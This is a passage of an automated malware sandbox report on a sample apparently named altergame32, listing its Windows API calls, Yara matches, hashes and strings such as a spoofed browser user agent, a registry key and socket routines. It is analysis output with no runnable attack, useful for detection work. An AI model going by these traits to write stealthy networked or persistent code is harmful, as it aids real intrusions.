                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E44EA6
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E450A7
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E450AD
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E450B8
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E450C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                  • String ID:
                                                                  • API String ID: 2062355503-0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                  • GetLastError.KERNEL32 ref: 00401F86
                                                                  • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                  • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                  • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                  • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                                  • GetTickCount.KERNEL32 ref: 00401FFB
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                  • String ID:
                                                                  • API String ID: 564119183-0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • Sleep.KERNEL32(0000EA60), ref: 02E46708
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E46713
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E46724
                                                                  • _free.LIBCMT ref: 02E47B50
                                                                  Strings
                                                                  • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02E46739
                                                                  • urls, xrefs: 02E47B36
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeaveSleep_free
                                                                  • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$urls
                                                                  • API String ID: 2653569029-4235545730

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02E42706
                                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02E4272B
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02E65B53), ref: 02E42738
                                                                    • Part of subcall function 02E41712: __EH_prolog.LIBCMT ref: 02E41717
                                                                  • SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02E42778
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02E427D9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                  • String ID: timer
                                                                  • API String ID: 4293676635-1792073242

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • WSASetLastError.WS2_32(00000000), ref: 02E42BE4
                                                                  • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02E42C07
                                                                    • Part of subcall function 02E4A508: WSAGetLastError.WS2_32(00000000,?,?,02E42A51), ref: 02E4A516
                                                                  • WSASetLastError.WS2_32 ref: 02E42CD3
                                                                  • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02E42CE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$Recvselect
                                                                  • String ID: 3'
                                                                  • API String ID: 886190287-280543908

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • WSASetLastError.WS2_32(00000000), ref: 02E42A3B
                                                                  • closesocket.WS2_32 ref: 02E42A42
                                                                  • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02E42A89
                                                                  • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02E42A97
                                                                  • closesocket.WS2_32 ref: 02E42A9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastclosesocket$ioctlsocket
                                                                  • String ID:
                                                                  • API String ID: 1561005644-0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 02E41BAC
                                                                  • RtlEnterCriticalSection.NTDLL ref: 02E41BBC
                                                                  • RtlLeaveCriticalSection.NTDLL ref: 02E41BEA
                                                                  • RtlEnterCriticalSection.NTDLL ref: 02E41C13
                                                                  • RtlLeaveCriticalSection.NTDLL ref: 02E41C56
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$H_prolog
                                                                  • String ID:
                                                                  • API String ID: 1633115879-0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetVersion.KERNEL32 ref: 00403336
                                                                    • Part of subcall function 00404454: HeapCreate.KERNEL32(00000000,00001000,00000000,0040336F,00000000), ref: 00404465
                                                                    • Part of subcall function 00404454: HeapDestroy.KERNEL32 ref: 004044A4
                                                                  • GetCommandLineA.KERNEL32 ref: 00403384
                                                                  • GetStartupInfoA.KERNEL32(?), ref: 004033AF
                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004033D2
                                                                    • Part of subcall function 0040342B: ExitProcess.KERNEL32 ref: 00403448
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                  • String ID:
                                                                  • API String ID: 2057626494-0
                                                                  • Opcode ID: b08ae2b8b777e4e577008e5565d37e94f80acee913e276c938b9cc00b58d7c54
                                                                  • Instruction ID: a936b3102d24e78b19d7c169988c3063d29dd1dd2c17feae02d4b7387c8d63d1
                                                                  • Opcode Fuzzy Hash: b08ae2b8b777e4e577008e5565d37e94f80acee913e276c938b9cc00b58d7c54
                                                                  • Instruction Fuzzy Hash: 172183B1900615AED704AFB5DE45A6E7F68EF44705F10413EF901B72D2DB385900CB58
                                                                  APIs
                                                                  • WSASetLastError.WS2_32(00000000), ref: 02E42EEE
                                                                  • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02E42EFD
                                                                  • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02E42F0C
                                                                  • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02E42F36
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$Socketsetsockopt
                                                                  • String ID:
                                                                  • API String ID: 2093263913-0
                                                                  • Opcode ID: 7156ce1f1fc5f519059e905a9798a81068a7e964b9575072ac599bda7587406e
                                                                  • Instruction ID: 53cf42dd36c6299561b3f32e4a6a9b1014dce7584b9f8e78ee9536360e40257e
                                                                  • Opcode Fuzzy Hash: 7156ce1f1fc5f519059e905a9798a81068a7e964b9575072ac599bda7587406e
                                                                  • Instruction Fuzzy Hash: 2A017971A90214BBDB205F66DC88B5BBBA9EB89765F40C555FA1897141D77088008B60
                                                                  APIs
                                                                    • Part of subcall function 02E42D39: WSASetLastError.WS2_32(00000000), ref: 02E42D47
                                                                    • Part of subcall function 02E42D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02E42D5C
                                                                  • WSASetLastError.WS2_32(00000000), ref: 02E42E6D
                                                                  • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02E42E83
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$Sendselect
                                                                  • String ID: 3'
                                                                  • API String ID: 2958345159-280543908
                                                                  • Opcode ID: 8261cbbd7e040e383fc85891d69d244b462be1b5858815362a1b4d8c87167ec0
                                                                  • Instruction ID: e27e34d7a11c1a31cc0417359ac6d269eced3456e44a91ff8ed1bef668766332
                                                                  • Opcode Fuzzy Hash: 8261cbbd7e040e383fc85891d69d244b462be1b5858815362a1b4d8c87167ec0
                                                                  • Instruction Fuzzy Hash: 3F31E4B0EA02199FDF11DF60E8547EE7BA5AF09358F00D45AFD0497240EBB19580CFA0
                                                                  APIs
                                                                  • WSASetLastError.WS2_32(00000000), ref: 02E42AEA
                                                                  • connect.WS2_32(?,?,?), ref: 02E42AF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastconnect
                                                                  • String ID: 3'
                                                                  • API String ID: 374722065-280543908
                                                                  • Opcode ID: 79f10b14e9f6b16635b7ee535041d6cfe29311dbd3a3d63bbeccb9f8f0f76bd4
                                                                  • Instruction ID: d4bab5aca922006761b765ecdc541f93dc0749b69aead70431f279441cd5076d
                                                                  • Opcode Fuzzy Hash: 79f10b14e9f6b16635b7ee535041d6cfe29311dbd3a3d63bbeccb9f8f0f76bd4
                                                                  • Instruction Fuzzy Hash: C921AA70E502145BCF14AF74E4646AEBBBADF44368F10D599FD1897280EFB455018F91
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProcSleep
                                                                  • String ID: B:%
                                                                  • API String ID: 1175476452-921457382
                                                                  • Opcode ID: 23616e709f3a8f92ee577e4f06470e49853b31bb415dd92b2dc5cf32625e53e4
                                                                  • Instruction ID: 5de13a12f4540e4fd9c75831dffb799ae9cb131bfc725f57e4845645b6027e56
                                                                  • Opcode Fuzzy Hash: 23616e709f3a8f92ee577e4f06470e49853b31bb415dd92b2dc5cf32625e53e4
                                                                  • Instruction Fuzzy Hash: 0B110631A08201DFDB00CF68CA99BAA3BA0AF04354F14412BF956EB2D0C374DA46DB5A
                                                                  APIs
                                                                  • RegCreateKeyExA.KERNEL32(80000002,Software\ATour), ref: 00402561
                                                                  • SetEvent.KERNEL32 ref: 00402AE0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: CreateEvent
                                                                  • String ID: Software\ATour
                                                                  • API String ID: 2692171526-3083386596
                                                                  • Opcode ID: f186dd0b7bc98dd43764a25f86a4cb0d0e809b4a92060d8c1256fdb064220542
                                                                  • Instruction ID: 97827390f0dbf811a8766feaa4b3b3f1fe6a4e1045c6de9f8130f5e784142085
                                                                  • Opcode Fuzzy Hash: f186dd0b7bc98dd43764a25f86a4cb0d0e809b4a92060d8c1256fdb064220542
                                                                  • Instruction Fuzzy Hash: BD117635E052829BD3105B30FF61BE27BB9A746760F04027EC996B72A2C3788C46E65C
                                                                  APIs
                                                                  • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D7B5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: ManagerOpen
                                                                  • String ID: \$sqlite3.dll
                                                                  • API String ID: 1889721586-2821398869
                                                                  • Opcode ID: 520e348fbed41caa7d91e0eeccad9f0cf03247776b24ec716f8ec42433566651
                                                                  • Instruction ID: 02cac2386a51af119043485a38359376ff8e08f267ee505fb347487170b15741
                                                                  • Opcode Fuzzy Hash: 520e348fbed41caa7d91e0eeccad9f0cf03247776b24ec716f8ec42433566651
                                                                  • Instruction Fuzzy Hash: AE116F71C08656DADB085BF45EA65FA3FA09701320F2045BFC557B12E1C13C4A09D72E
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: e005e631adcad1577092bc4db21f8fc0502daccfd31109ffa44fa2af9c9c872a
                                                                  • Instruction ID: bc160ffbaa80b8f197a4ea664d8518830416ad7b21d913ba57212c39b7a45849
                                                                  • Opcode Fuzzy Hash: e005e631adcad1577092bc4db21f8fc0502daccfd31109ffa44fa2af9c9c872a
                                                                  • Instruction Fuzzy Hash: BF514F71A45216DFCB08DF68D4506AABBB1FF08324F20D19EF8299B380DB749910CFA0
                                                                  APIs
                                                                  • InterlockedIncrement.KERNEL32(?), ref: 02E436A7
                                                                    • Part of subcall function 02E42420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02E42432
                                                                    • Part of subcall function 02E42420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02E42445
                                                                    • Part of subcall function 02E42420: RtlEnterCriticalSection.NTDLL(?), ref: 02E42454
                                                                    • Part of subcall function 02E42420: InterlockedExchange.KERNEL32(?,00000001), ref: 02E42469
                                                                    • Part of subcall function 02E42420: RtlLeaveCriticalSection.NTDLL(?), ref: 02E42470
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                  • String ID:
                                                                  • API String ID: 1601054111-0
                                                                  • Opcode ID: d211e34b6d139ab72ac64cc5d493fafcb3ca20d92fa503e8bf2d7bd4044a55e2
                                                                  • Instruction ID: 4cbbb66d55d6996949d9e3b32e898ef0eb67352b96c8076d8e835487f90e34f4
                                                                  • Opcode Fuzzy Hash: d211e34b6d139ab72ac64cc5d493fafcb3ca20d92fa503e8bf2d7bd4044a55e2
                                                                  • Instruction Fuzzy Hash: 2011C4B5180209ABDF218E14EC49FAB3B65EF40368F209456FE56C6290CF74D860CBA4
                                                                  APIs
                                                                  • __beginthreadex.LIBCMT ref: 02E52106
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02E4A988,00000000), ref: 02E52137
                                                                  • ResumeThread.KERNEL32(?,?,?,?,?,00000002,02E4A988,00000000), ref: 02E52145
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseHandleResumeThread__beginthreadex
                                                                  • String ID:
                                                                  • API String ID: 1685284544-0
                                                                  • Opcode ID: 2f3d3042339cd3ef1e2adb74820c335abed5c67aa5c95d1b3011e2eacd4af4bf
                                                                  • Instruction ID: 16fde02529d23301ce0c9bcd8672aaaf5cfe3f3317db516ad803887f2d34e807
                                                                  • Opcode Fuzzy Hash: 2f3d3042339cd3ef1e2adb74820c335abed5c67aa5c95d1b3011e2eacd4af4bf
                                                                  • Instruction Fuzzy Hash: A7F0C8702902105BE7209E59DC84F96B3D8EF48368F14855AFB54C7281C771A8929AA0
                                                                  APIs
                                                                  • InterlockedIncrement.KERNEL32(02E772B4), ref: 02E41ABA
                                                                  • WSAStartup.WS2_32(00000002,00000000), ref: 02E41ACB
                                                                  • InterlockedExchange.KERNEL32(02E772B8,00000000), ref: 02E41AD7
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Interlocked$ExchangeIncrementStartup
                                                                  • String ID:
                                                                  • API String ID: 1856147945-0
                                                                  • Opcode ID: cb47f5d46b9b289c51cb49a74b59baeca83a5b3465e0bcd4ddb93991c678d31d
                                                                  • Instruction ID: d4bb6e9801f7c80ad273a4db53f32670dfcceae1a02bb21d050913b92b528793
                                                                  • Opcode Fuzzy Hash: cb47f5d46b9b289c51cb49a74b59baeca83a5b3465e0bcd4ddb93991c678d31d
                                                                  • Instruction Fuzzy Hash: A0D05E719D42145BE61066A5AC0EA7AFB2CE705669F801656FC7EC00C0EA50596095B6
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID: Eshenc43
                                                                  • API String ID: 3535843008-4181249012
                                                                  • Opcode ID: 15ef28204f07d7b48703b89e2d6c5d33e29141c309989999f2207bc0bfe5d7bc
                                                                  • Instruction ID: be004e59aa3699ca12022b62cae7feaba2be92beb7ca5540e0a9a012bdacf4b0
                                                                  • Opcode Fuzzy Hash: 15ef28204f07d7b48703b89e2d6c5d33e29141c309989999f2207bc0bfe5d7bc
                                                                  • Instruction Fuzzy Hash: 76F027325087425ADF120BB40A696D47BB1AB42300B24247FD4D2711E3C3BC4513E71E
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID: EShineEncoder
                                                                  • API String ID: 3535843008-1597600474
                                                                  • Opcode ID: 5b41531665007a81d217991c6893f759ccf1358bb147f584ce279fc5a91da054
                                                                  • Instruction ID: 012348b20830d107378ed8136720504f13b5e39aecd52ebec1987391a0c9276e
                                                                  • Opcode Fuzzy Hash: 5b41531665007a81d217991c6893f759ccf1358bb147f584ce279fc5a91da054
                                                                  • Instruction Fuzzy Hash: 30D0EC71C48200EAC7411EF04D0957A7925BF09344735457BA003B91E5CABA490BD71E
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 0040DC62
                                                                  Strings
                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040D5E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                  • API String ID: 71445658-2036018995
                                                                  • Opcode ID: 3bf725d415e05b0408b9a947ea3942c27790e6a72a6ab1259dd2e36986a1b2c9
                                                                  • Instruction ID: 46e6dc69ee420d112a3caf2eee0461ed8c1b04e216817f0ca4a34adcfc96ca13
                                                                  • Opcode Fuzzy Hash: 3bf725d415e05b0408b9a947ea3942c27790e6a72a6ab1259dd2e36986a1b2c9
                                                                  • Instruction Fuzzy Hash: 5FC00250A08216DAE74466A14E5DA7672586710748F2045379D07B01D1E67C550BF51E
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 02E44BF2
                                                                    • Part of subcall function 02E41BA7: __EH_prolog.LIBCMT ref: 02E41BAC
                                                                    • Part of subcall function 02E41BA7: RtlEnterCriticalSection.NTDLL ref: 02E41BBC
                                                                    • Part of subcall function 02E41BA7: RtlLeaveCriticalSection.NTDLL ref: 02E41BEA
                                                                    • Part of subcall function 02E41BA7: RtlEnterCriticalSection.NTDLL ref: 02E41C13
                                                                    • Part of subcall function 02E41BA7: RtlLeaveCriticalSection.NTDLL ref: 02E41C56
                                                                    • Part of subcall function 02E4E0F7: __EH_prolog.LIBCMT ref: 02E4E0FC
                                                                    • Part of subcall function 02E4E0F7: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02E4E17B
                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02E44CF2
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                  • String ID:
                                                                  • API String ID: 1927618982-0
                                                                  • Opcode ID: c10775b474d162bc695c1b684a261532a9239c023b19c367ed9f294ad9318bf2
                                                                  • Instruction ID: 8a815f407cd0b79850398083d48818f47a55701cf5549f813e40edc3878adb46
                                                                  • Opcode Fuzzy Hash: c10775b474d162bc695c1b684a261532a9239c023b19c367ed9f294ad9318bf2
                                                                  • Instruction Fuzzy Hash: 72515771E44248DFDB05DFA8D884AEEBBB5FF09314F14915AE905AB391DB309A44CF60
                                                                  APIs
                                                                  • WSASetLastError.WS2_32(00000000), ref: 02E42D47
                                                                  • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02E42D5C
                                                                    • Part of subcall function 02E4A508: WSAGetLastError.WS2_32(00000000,?,?,02E42A51), ref: 02E4A516
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$Send
                                                                  • String ID:
                                                                  • API String ID: 1282938840-0
                                                                  • Opcode ID: 2e341244993b856edfbed5ed4c470c2b7ab3d1a9415373cc18fe04d61edddcd8
                                                                  • Instruction ID: 333a791e784525ef3cf53cb2806d213f769eeaca6631e986740c8618e1313bf1
                                                                  • Opcode Fuzzy Hash: 2e341244993b856edfbed5ed4c470c2b7ab3d1a9415373cc18fe04d61edddcd8
                                                                  • Instruction Fuzzy Hash: CC01D8B1540209AFD7205F55D89486BBBECFF493A8B10852EFD5983200EF708D00CB61
                                                                  APIs
                                                                  • CopyFileA.KERNEL32 ref: 0040D0F2
                                                                  • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D7B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: CopyFileManagerOpen
                                                                  • String ID:
                                                                  • API String ID: 3059512871-0
                                                                  • Opcode ID: 9e3146827b823fb72847a81831b6f9f609e1ae4ab21fb75e0122e33f8468bf4c
                                                                  • Instruction ID: 63a47c692e634ecde8090716e013d1652f7ed24adeb4c2df2f38a42cb0036bbc
                                                                  • Opcode Fuzzy Hash: 9e3146827b823fb72847a81831b6f9f609e1ae4ab21fb75e0122e33f8468bf4c
                                                                  • Instruction Fuzzy Hash: 2AF090768052929AEB085B71BFB65E67FA4D702331B00027AD693B12F2D27C4A45D729
                                                                  APIs
                                                                  • WSASetLastError.WS2_32(00000000), ref: 02E48406
                                                                  • shutdown.WS2_32(?,00000002), ref: 02E4840F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastshutdown
                                                                  • String ID:
                                                                  • API String ID: 1920494066-0
                                                                  • Opcode ID: d37623be7d9e36bcb236ed0f93714b3c7ede0664a344a167b62e83d00ea6504d
                                                                  • Instruction ID: a85932f67b2634e44acb0159abf075ee7c557ba4499e9ca6fca572bd7ad1ba6a
                                                                  • Opcode Fuzzy Hash: d37623be7d9e36bcb236ed0f93714b3c7ede0664a344a167b62e83d00ea6504d
                                                                  • Instruction Fuzzy Hash: D5F090716943148FC710AF14E824B5AB7E5FF08369F40881CFD9997380DB70AC10CBA1
                                                                  APIs
                                                                  • HeapCreate.KERNEL32(00000000,00001000,00000000,0040336F,00000000), ref: 00404465
                                                                    • Part of subcall function 0040430C: GetVersionExA.KERNEL32 ref: 0040432B
                                                                  • HeapDestroy.KERNEL32 ref: 004044A4
                                                                    • Part of subcall function 0040482B: HeapAlloc.KERNEL32(00000000,00000140,0040448D,000003F8), ref: 00404838
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocCreateDestroyVersion
                                                                  • String ID:
